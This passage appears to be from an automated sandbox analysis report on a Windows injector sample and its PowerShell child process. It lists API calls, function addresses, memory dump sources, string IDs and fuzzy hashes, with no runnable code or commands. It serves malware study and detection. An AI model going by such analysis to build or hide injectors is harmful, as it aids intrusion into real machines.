                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-224404859
                                            • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                            • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                            • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                            • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                            Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
                                            • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                            • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                            • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

                                            Executed Functions

                                            Function 0464E3E0 Relevance: .7, Instructions: 716COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7e4ab0b280f1c2fa9b30f0b8109d173999bf59b4f288cc2247ade0d10296fed
                                            • Instruction ID: fcddcd6f1bb0e45f35e2abf7a269fba706f7ac7e0c9de3a7a6b7ae7eee1f9272
                                            • Opcode Fuzzy Hash: a7e4ab0b280f1c2fa9b30f0b8109d173999bf59b4f288cc2247ade0d10296fed
                                            • Instruction Fuzzy Hash: 41526A30B00219CFDF64CFA4C9547ADBBB2FF95200F14859AD40AAB351FB31AA86DB51
                                            Function 074D4D68 Relevance: 28.6, Strings: 22, Instructions: 1099COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                            • API String ID: 0-3727103184
                                            • Opcode ID: da7e5a6e489a58b8b6e0ec255cda322ce07926e77ad733b6d15dcbc41a0e28ca
                                            • Instruction ID: 45d0ba21adda68ceb663eafd250452dca1f311190e42aa64e1df8a2a643bfa64
                                            • Opcode Fuzzy Hash: da7e5a6e489a58b8b6e0ec255cda322ce07926e77ad733b6d15dcbc41a0e28ca
                                            • Instruction Fuzzy Hash: 3DA285B0B00214DFDB24CBA8C455B9ABBB2AF84314F218569D9459F786CB72EC85CFD1
                                            Function 092B0498 Relevance: 19.4, Strings: 15, Instructions: 700COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-1399123086
                                            • Opcode ID: ec01de394fa4f45d835989f582473f6f923c18acb6e07e6a85c6b698e40dd77a
                                            • Instruction ID: b47436ef400340300934a1ab96fd029edfac9f35f3c1e521eef9dbaab1f9a218
                                            • Opcode Fuzzy Hash: ec01de394fa4f45d835989f582473f6f923c18acb6e07e6a85c6b698e40dd77a
                                            • Instruction Fuzzy Hash: 4F42D371B60205CFCB268F68C551AEBBBF2AF84394F14806AE9059F795DB31DC41CBA1
                                            Function 074D4D4A Relevance: 14.6, Strings: 11, Instructions: 891COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                            • API String ID: 0-477184059
                                            • Opcode ID: f436d8ed059b8330d9ae6570b6bcd6ffec8c558c8c7f7af82576cf216646c376
                                            • Instruction ID: caa76650971c70cf43b6131150abf5f5323d5878d8199f7d57771b0ab8b3ce5a
                                            • Opcode Fuzzy Hash: f436d8ed059b8330d9ae6570b6bcd6ffec8c558c8c7f7af82576cf216646c376
                                            • Instruction Fuzzy Hash: 718293B0A00214DFDB20CB98C451F9ABBB2EF84714F21855AE9456F786CB76EC85CF91
                                            Function 092B2488 Relevance: 12.1, Strings: 9, Instructions: 848COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$\5)$\5)$tPfq$tPfq$$fq$$fq$$fq
                                            • API String ID: 0-3499730968
                                            • Opcode ID: 3e6881a0cf58b5ad1be284cc02473a2894123add0a9736f4e5a6eb07614905da
                                            • Instruction ID: 701710cc999ebcdb1997fa560eadf58b09246f96c2aef5ecd02bc49b935cf5d8
                                            • Opcode Fuzzy Hash: 3e6881a0cf58b5ad1be284cc02473a2894123add0a9736f4e5a6eb07614905da
                                            • Instruction Fuzzy Hash: 6A524730B20306DFCB15DF68C5516EABBE2BF95350F2484AAE9259F291DB31DC41CBA1
                                            Function 074D1228 Relevance: 11.8, Strings: 9, Instructions: 596COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$tPfq$tPfq$$fq
                                            • API String ID: 0-2123550768
                                            • Opcode ID: d22f0c12511fea83a5f07fd0f4bc4cda75b8de86aa41e609d30da51c1e54527b
                                            • Instruction ID: 6e3e04d689270ceb2d27e36e9488f8ffc69f5094ed71f929456a9c155ac29f8d
                                            • Opcode Fuzzy Hash: d22f0c12511fea83a5f07fd0f4bc4cda75b8de86aa41e609d30da51c1e54527b
                                            • Instruction Fuzzy Hash: 3432D4B0B102099FDB14DBA8C451B9ABBB3EF85304F15C06AE9459F786CB72EC45CB91
                                            Function 074D34B8 Relevance: 10.8, Strings: 8, Instructions: 829COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq
                                            • API String ID: 0-4215353002
                                            • Opcode ID: 57d6d06b48364e4d4e18fe3d4d1451a5ad717fa0a28014544ad0b79f65f2deef
                                            • Instruction ID: d1b1f77cac9fbc4b8ae18ef668e1505d78527203e189acf87b70536fce35a7e5
                                            • Opcode Fuzzy Hash: 57d6d06b48364e4d4e18fe3d4d1451a5ad717fa0a28014544ad0b79f65f2deef
                                            • Instruction Fuzzy Hash: 467280B0B00215DFDB54CF98C891B9ABBB2AF85304F14C0AAD9499F785CB71ED85CB91
                                            Function 074D0538 Relevance: 6.4, Strings: 5, Instructions: 150COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                            • API String ID: 0-3759051638
                                            • Opcode ID: d8d55b491d5ade491bd32cbe4cb04b36cd5cf57b083915ece319757dffabaae0
                                            • Instruction ID: ebe36ec1105f5786a230cd3b7b1aa3e356d4966dcdb35e5a9444ed063b28299b
                                            • Opcode Fuzzy Hash: d8d55b491d5ade491bd32cbe4cb04b36cd5cf57b083915ece319757dffabaae0
                                            • Instruction Fuzzy Hash: B641C7B1B152459FCB159AA488316EB7FA2DFC2210F14846BD981CB3A1DB36CD46C7A2
                                            Function 074D96D8 Relevance: 5.6, Strings: 4, Instructions: 582COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq
                                            • API String ID: 0-359900465
                                            • Opcode ID: 8bdc1c64e84fa1ce7243c842d7b24ac80362636ea5d1fdedad8f396052f36688
                                            • Instruction ID: 4a518719303b24e8911004c9c80292c495d1ba7220ce6092df8e8840fd8e7e21
                                            • Opcode Fuzzy Hash: 8bdc1c64e84fa1ce7243c842d7b24ac80362636ea5d1fdedad8f396052f36688
                                            • Instruction Fuzzy Hash: 581206F2B143559FCB158BA888217ABBBA2EFC2210F14C4ABD585CB751DB31EC45C7A1
                                            Function 074DC538 Relevance: 3.0, Strings: 2, Instructions: 502COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq
                                            • API String ID: 0-751858264
                                            • Opcode ID: 67ae24aa3a3b820c58c059f5754030a3a1268b20400e7f016da7ad91a63173e5
                                            • Instruction ID: 32d88c43638b4cb9f1b89d44e26f75237258eb1944cc8acd443898905a1c666f
                                            • Opcode Fuzzy Hash: 67ae24aa3a3b820c58c059f5754030a3a1268b20400e7f016da7ad91a63173e5
                                            • Instruction Fuzzy Hash: 0A2251B07102149FC754DB68CC91B9BBBA2AF85704F508495E9099F781CB72ED86CFE1
                                            Function 074D41B1 Relevance: 3.0, Strings: 2, Instructions: 485COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$|
                                            • API String ID: 0-3203227909
                                            • Opcode ID: 056b685e70a4ef5e2202f80ce86b4bbe37a20813501604bb730b522bdb62f3a5
                                            • Instruction ID: f903ff8ee692a0c204992f3a32fb7d64d2c1d9e6bed73efb320c95530d82ac33
                                            • Opcode Fuzzy Hash: 056b685e70a4ef5e2202f80ce86b4bbe37a20813501604bb730b522bdb62f3a5
                                            • Instruction Fuzzy Hash: 6F226DB4A00214DFDB54CB58C891F9ABBB2AF84704F14C4D9E948AB791CB72ED85CF91
                                            Function 074D0C68 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tPfq$tPfq
                                            • API String ID: 0-2659045182
                                            • Opcode ID: ae59b8dd9ba80a31bd81ac6b09b04fadfca45521df854d2ad0e28b6deff3078a
                                            • Instruction ID: f26be192914aa1b4c758c7aacbd770f238291b0d047eff660f84a3025ce02a86
                                            • Opcode Fuzzy Hash: ae59b8dd9ba80a31bd81ac6b09b04fadfca45521df854d2ad0e28b6deff3078a
                                            • Instruction Fuzzy Hash: CE5148B1B143469FCB254BA988307ABBFA69FC6710F14846BD595CB3A2CA35DC41C3A1
                                            Function 074D40A0 Relevance: 1.9, Strings: 1, Instructions: 644COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 55276c3b7ff8bf818a399c6748cc7fae6d4051782a4968cb3647d9915ee6bcd4
                                            • Instruction ID: c4ea4de140caed3e1291d2273c4653036aec3a3016bf4883b5c658f70e8fd725
                                            • Opcode Fuzzy Hash: 55276c3b7ff8bf818a399c6748cc7fae6d4051782a4968cb3647d9915ee6bcd4
                                            • Instruction Fuzzy Hash: 57526BB0B00215DFDB54CB58C891B9ABBB2AF84704F14C0D9E9499B792CB72ED85CF91
                                            Function 074DCD29 Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 765da91095bad80d9f7639a9e86ef2b36d2c125d08ca0c8d85a620e5ecef7efc
                                            • Instruction ID: 9d59116bf71f173a184c3c19e4c874dc327da92fe1ea38415dd1029f88f63c19
                                            • Opcode Fuzzy Hash: 765da91095bad80d9f7639a9e86ef2b36d2c125d08ca0c8d85a620e5ecef7efc
                                            • Instruction Fuzzy Hash: 4B424FB07102149FC754DB58CC91BDBBBA2AF89704F508499E9099B781CB72ED86CFE1
                                            Function 074DCE10 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 536e882254d504f66b23c277f7f2cd6c86dab48abd947abb1086b6886da21c0a
                                            • Instruction ID: 99280c82acdc4e0de15b386386313f4489830f8a92218afef09bedda7f257e9c
                                            • Opcode Fuzzy Hash: 536e882254d504f66b23c277f7f2cd6c86dab48abd947abb1086b6886da21c0a
                                            • Instruction Fuzzy Hash: CD124FB07102149FC754DB98CC91B9BBBA2AF89704F508495E9099F781CB72ED86CFE1
                                            Function 092B06A8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 4251f5158026da11eeb45c63fe9bde986ff18c649721c6565472dc2b619ba27a
                                            • Instruction ID: 5794f9fead096a5762f4ad3a9ef2af0dcecc685d3e8a9fec845c9f4d15c01794
                                            • Opcode Fuzzy Hash: 4251f5158026da11eeb45c63fe9bde986ff18c649721c6565472dc2b619ba27a
                                            • Instruction Fuzzy Hash: C0213AB2A70205DBCF214E6585417FBB6E19F807C0F144035E911DF68AEA75C980DBE2
                                            Function 0464F038 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 7c0dfa49ec8b7492b41866d5284ae51c265f08948d48e55c92673f20624b5ac3
                                            • Instruction ID: 82af2577ac0ba9f07317ca28e0733b8b45b970a4fb5f707a954fc9224a56c68e
                                            • Opcode Fuzzy Hash: 7c0dfa49ec8b7492b41866d5284ae51c265f08948d48e55c92673f20624b5ac3
                                            • Instruction Fuzzy Hash: D40126303453402BD3189B75AC90B6E2F63EFC1600F2408ADD0469F3EACDA06C0997A5
                                            Function 0464F048 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: aa4c3ae0d4bb3ccd4b6ecd584c66b2c695523a149ba5b75102bbcac2d08d2730
                                            • Instruction ID: df8a7ee3ccffc38bc1545b5751c7e9cad8bfa17a82da3e5a7ca84a2190defa84
                                            • Opcode Fuzzy Hash: aa4c3ae0d4bb3ccd4b6ecd584c66b2c695523a149ba5b75102bbcac2d08d2730
                                            • Instruction Fuzzy Hash: C7F090303403002BD21CAA6AAC91F6F765BEBC5A50F60597CE1065F3EADDA1AC0956A5
                                            Function 092A0040 Relevance: .4, Instructions: 413COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 124e6fc5ac385540c2685b36c0b1367ca66c221b98a3dc0689f2292cabde76b2
                                            • Instruction ID: 2fdb14d7bc3be56ddfc6cb359222e34008fb8d50232eb1f6b40760ca4f19591f
                                            • Opcode Fuzzy Hash: 124e6fc5ac385540c2685b36c0b1367ca66c221b98a3dc0689f2292cabde76b2
                                            • Instruction Fuzzy Hash: 7C021B75A112599FCB05CFA8C994AEEBBF2FF49310F248559E804AB361C731EC81CB90
                                            Function 074DD25C Relevance: .3, Instructions: 336COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08552ed993573111b8b6a51c7ca8873a684590ecc868735ec2b409d05358d557
                                            • Instruction ID: 52b4101aabfbf79a4c10e8a166624194de31bdf31bec29a08dfb6ff31a5e79b5
                                            • Opcode Fuzzy Hash: 08552ed993573111b8b6a51c7ca8873a684590ecc868735ec2b409d05358d557
                                            • Instruction Fuzzy Hash: D3E16DB0F10218DFDB64DBA8C891B9ABBB2AF85304F1084D6D549AB785CB31DD85CF91
                                            Function 046472A0 Relevance: .3, Instructions: 318COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6ef03de52cb9d4bec191a32c3727268427d338e5100034bf07d082b16c00d24
                                            • Instruction ID: 1b3fa7dfa394af77def9c92636aedbc5b35ee756406f76ae0692cc3b127feee5
                                            • Opcode Fuzzy Hash: d6ef03de52cb9d4bec191a32c3727268427d338e5100034bf07d082b16c00d24
                                            • Instruction Fuzzy Hash: FFC18E35A00248DFCB14DFA4D544AADBBB2FFC4311F158569E406AB365EB34ED89CB90
                                            Function 046495A8 Relevance: .3, Instructions: 262COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ffd25b3b690c75cf9bde5a46917014cfa34f38083c73bd69ec406edc88f4d9a
                                            • Instruction ID: 3d9b4ac7dccc0c1ea4e264806e966d8dbccd942e5ce688fb44190586ef7ffa8b
                                            • Opcode Fuzzy Hash: 0ffd25b3b690c75cf9bde5a46917014cfa34f38083c73bd69ec406edc88f4d9a
                                            • Instruction Fuzzy Hash: 0C911A6140E3E59FDB079B3C99B11D67F70AE4322470A05D7C480CF2A3E929AD4ED7A6
                                            Function 074D6170 Relevance: .2, Instructions: 234COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfa87d9cecddd676ecad9cea9320027663205978f5d4bbd361811797df1c6d1c
                                            • Instruction ID: 163ea075e11ca50ceb0e1ae1137ea9fd4fc7480b67251e58cdceb9d46ec050ba
                                            • Opcode Fuzzy Hash: cfa87d9cecddd676ecad9cea9320027663205978f5d4bbd361811797df1c6d1c
                                            • Instruction Fuzzy Hash: B7715CB17103168FCB149E6984212EBBBA5EFC5290F15847BD985CB781DB70DD41CBA3
                                            Function 092B09F4 Relevance: .2, Instructions: 208COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 72cd20298fbe8aee426ac592955b3d127fe0d89d9d12151fd917d0ef28c78ed7
                                            • Instruction ID: b53bb43d0c9010a7f61d349dbf400a2d2bad36820e8c24899194476ab8481a02
                                            • Opcode Fuzzy Hash: 72cd20298fbe8aee426ac592955b3d127fe0d89d9d12151fd917d0ef28c78ed7
                                            • Instruction Fuzzy Hash: 44815AB5A60205DFCB15CF58C591A9ABBF2AF88354F14C499E904AF359C732EC41CFA1
                                            Function 04647A68 Relevance: .2, Instructions: 191COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea7c3720c7649a0c33b42312ec9dbeb47b9b0947e8492b9b3875d95af49511b3
                                            • Instruction ID: adde2038e2a3fc5a8c2b39325fb9dc71daa890532776c82943aec2806732b93d
                                            • Opcode Fuzzy Hash: ea7c3720c7649a0c33b42312ec9dbeb47b9b0947e8492b9b3875d95af49511b3
                                            • Instruction Fuzzy Hash: 95718D71A002098FCB14DF68C884A9EBBF2FF89315F14896AD4159B791EB71AD46CB90
                                            Function 04647BD6 Relevance: .2, Instructions: 188COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
